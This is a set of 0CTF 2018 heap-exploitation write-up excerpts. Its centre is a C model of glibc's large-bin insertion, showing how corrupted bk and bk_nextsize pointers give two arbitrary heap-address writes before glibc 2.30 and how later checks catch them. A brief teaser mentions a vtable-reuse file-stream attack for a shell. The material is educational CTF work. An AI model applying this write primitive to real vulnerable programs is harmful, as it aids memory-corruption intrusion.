0CTF 2018 PWN Heapstorm2 Write-up


A nice challenge that led me to revisit the source of libc malloc. Please read my post "A Revisit to Large Bin" first before reading this one.


Extra Heap Exploitation 3: A Revisit to Large Bin in Glibc


In my post on the allocation internals of ptmalloc, I actually missed one part of the code in _int_malloc. In the recent 0CTF 2018, this part of the code was used to launch the exploit, so I decided to introduce it in this post. In my previous posts, I only introduced how large chunks are retrieved from the largebin, but I missed the part on how freed chunks are inserted into the largebin (this happens inside _int_malloc, when chunks sitting in the unsorted bin are sorted into their bins, not inside free). This post gives a detailed introduction to that part.
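As an added illustration for the two posts above (this is not code from the original posts or from glibc itself, but a model that transcribes the large-bin insertion branch of _int_malloc onto a minimal chunk struct), the following C program shows how a chunk is linked into a large bin through both list pairs (fd/bk and fd_nextsize/bk_nextsize), and which two stores that path performs through the bk and bk_nextsize of a chunk already in the bin when those fields have been corrupted. The chunk layout, the sizes, the two "target" structs and the `hardened` flag (modelling the integrity checks glibc 2.30 added to this branch) are all constructed for the example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Model of the malloc_chunk fields that large-bin insertion touches.  Real
 * chunks also carry prev_size and flag bits in size; this is a constructed
 * model for illustration, not glibc's own struct. */
typedef struct chunk {
    size_t size;
    struct chunk *fd, *bk;                   /* circular list of the whole bin */
    struct chunk *fd_nextsize, *bk_nextsize; /* skip list: first chunk of each size */
} chunk;

static int hardened = 0; /* 1: apply the checks glibc 2.30 added to this path */

static void bin_init(chunk *bin) {
    memset(bin, 0, sizeof *bin);
    bin->fd = bin->bk = bin; /* an empty bin header points to itself */
}

/* Transcription of the _int_malloc branch that sorts an unsorted chunk into its
 * large bin: the bin stays in descending size order and the nextsize list links
 * the first chunk of each size.  Returns 0, or -1 where hardened glibc would
 * abort with malloc_printerr(). */
static int largebin_insert(chunk *bin, chunk *victim) {
    size_t size = victim->size;
    chunk *bck = bin, *fwd = bck->fd;

    if (fwd != bck) {                    /* bin not empty */
        if (size < bck->bk->size) {      /* smaller than the smallest: new tail */
            fwd = bck;
            bck = bck->bk;
            victim->fd_nextsize = fwd->fd;
            victim->bk_nextsize = fwd->fd->bk_nextsize;
            fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
        } else {
            while (size < fwd->size)     /* walk the skip list, largest first */
                fwd = fwd->fd_nextsize;
            if (size == fwd->size) {
                fwd = fwd->fd;           /* same size: second position, off the skip list */
            } else {
                victim->fd_nextsize = fwd;
                victim->bk_nextsize = fwd->bk_nextsize;
                if (hardened && fwd->bk_nextsize->fd_nextsize != fwd)
                    return -1;           /* "largebin double linked list corrupted (nextsize)" */
                fwd->bk_nextsize = victim;
                victim->bk_nextsize->fd_nextsize = victim; /* store 1: through bk_nextsize */
            }
            bck = fwd->bk;
            if (hardened && bck->fd != fwd)
                return -1;               /* "largebin double linked list corrupted (bk)" */
        }
    } else {
        victim->fd_nextsize = victim->bk_nextsize = victim;
    }
    victim->bk = bck;
    victim->fd = fwd;
    fwd->bk = victim;
    bck->fd = victim;                    /* store 2: through bk */
    return 0;
}

/* Sort five constructed chunks into one bin; fills the bin order and the
 * skip-list order (both as sizes) and returns the number of chunks in the bin. */
static int sorted_demo(size_t *order, size_t *skip, int *nskip) {
    static chunk bin, c[5];
    const size_t in[5] = {0x400, 0x500, 0x400, 0x600, 0x450};
    int n = 0;
    bin_init(&bin);
    for (int i = 0; i < 5; i++) {
        memset(&c[i], 0, sizeof c[i]);
        c[i].size = in[i];
        largebin_insert(&bin, &c[i]);
    }
    for (chunk *p = bin.fd; p != &bin; p = p->fd) order[n++] = p->size;
    *nskip = 0;
    for (chunk *p = bin.fd; ; p = p->fd_nextsize) {
        skip[(*nskip)++] = p->size;
        if (p->fd_nextsize == bin.fd) break;
    }
    return n;
}
static size_t demo_order_at(int i) { size_t o[5], s[5]; int k; sorted_demo(o, s, &k); return o[i]; }
static int demo_skip_count(void) { size_t o[5], s[5]; int k; sorted_demo(o, s, &k); return k; }

/* A chunk already in the bin has attacker-controlled bk and bk_nextsize (t1, t2
 * stand in for chosen addresses).  Sorting a larger chunk in then stores the
 * victim's address through both.  Returns 1 if both stores landed, 0 if not,
 * -1 if the hardened checks caught it. */
static int corrupted_insert_demo(int harden) {
    static chunk bin, in_bin, victim, t1, t2;
    hardened = harden;
    bin_init(&bin);
    memset(&in_bin, 0, sizeof in_bin); in_bin.size = 0x400;
    largebin_insert(&bin, &in_bin);
    memset(&t1, 0, sizeof t1); memset(&t2, 0, sizeof t2);
    in_bin.bk = &t1;          /* corrupted, e.g. by an overflow into the free chunk */
    in_bin.bk_nextsize = &t2;
    memset(&victim, 0, sizeof victim); victim.size = 0x500;
    if (largebin_insert(&bin, &victim) < 0) return -1;
    return (t1.fd == &victim && t2.fd_nextsize == &victim) ? 1 : 0;
}

int main(void) {
    size_t o[5], s[5]; int k, n = sorted_demo(o, s, &k);
    printf("bin order:");
    for (int i = 0; i < n; i++) printf(" %#zx", o[i]);
    printf("\nskip-list entries: %d\n", k);
    printf("corrupted insert, unchecked: %d\n", corrupted_insert_demo(0));
    printf("corrupted insert, hardened:  %d\n", corrupted_insert_demo(1));
    return 0;
}
```

The two stores marked in `largebin_insert` are the reason this branch matters for exploitation: with a writable `bk` and `bk_nextsize` on a free chunk in the bin, sorting a larger chunk writes that chunk's heap address to two attacker-chosen locations without any further check on glibc versions before 2.30. On 2.30 and later the modelled checks fire on both stores, so the model returns -1 instead; the first branch (victim smaller than the smallest chunk in the bin) is left unchecked here exactly as in glibc.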

0CTF 2018 PWN BabyHeap Write-up


I take this challenge as a variation of FSOP (File Stream Oriented Programming). The glibc library given in this challenge is already patched with an extra check on the validity of the vtable of the fake file stream. Though I have mentioned some bypass techniques in my previous posts, here I use the so-called vtable reuse attack to finally get the shell.